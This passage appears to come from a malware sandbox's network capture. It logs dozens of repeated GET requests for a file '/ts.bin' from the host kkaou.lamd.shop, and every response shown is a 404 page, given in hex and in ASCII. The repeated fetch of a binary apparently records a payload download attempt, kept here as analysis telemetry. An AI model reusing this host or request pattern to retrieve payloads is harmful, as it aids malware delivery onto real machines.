                                              Date: Mon, 25 Nov 2024 06:10:30 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Nov 25, 2024 07:10:45.379820108 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:45.766204119 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:31 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:45.879610062 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:46.265861034 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:31 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:46.648514032 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:47.421654940 CET191INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:32 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Nov 25, 2024 07:10:47.535749912 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:47.921772957 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:33 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:48.035767078 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:48.421500921 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:33 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:48.536160946 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:48.922317982 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:34 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:49.247086048 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:49.632863998 CET191INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:35 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Nov 25, 2024 07:10:49.942403078 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:50.329117060 CET191INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:35 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Nov 25, 2024 07:10:50.630877972 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:51.018502951 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:36 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:51.129829884 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:51.520728111 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:37 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:51.631340027 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:52.017482996 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:37 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:52.188402891 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:52.575236082 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:38 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:52.696072102 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:53.081974030 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:38 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:53.192161083 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:53.578121901 CET191INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:39 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Nov 25, 2024 07:10:53.879445076 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:54.265144110 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:39 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                              Nov 25, 2024 07:10:54.380690098 CET166OUTGET /ts.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: kkaou.lamd.shop
                                              Cache-Control: no-cache
                                              Nov 25, 2024 07:10:54.766330004 CET506INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 25 Nov 2024 06:10:40 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
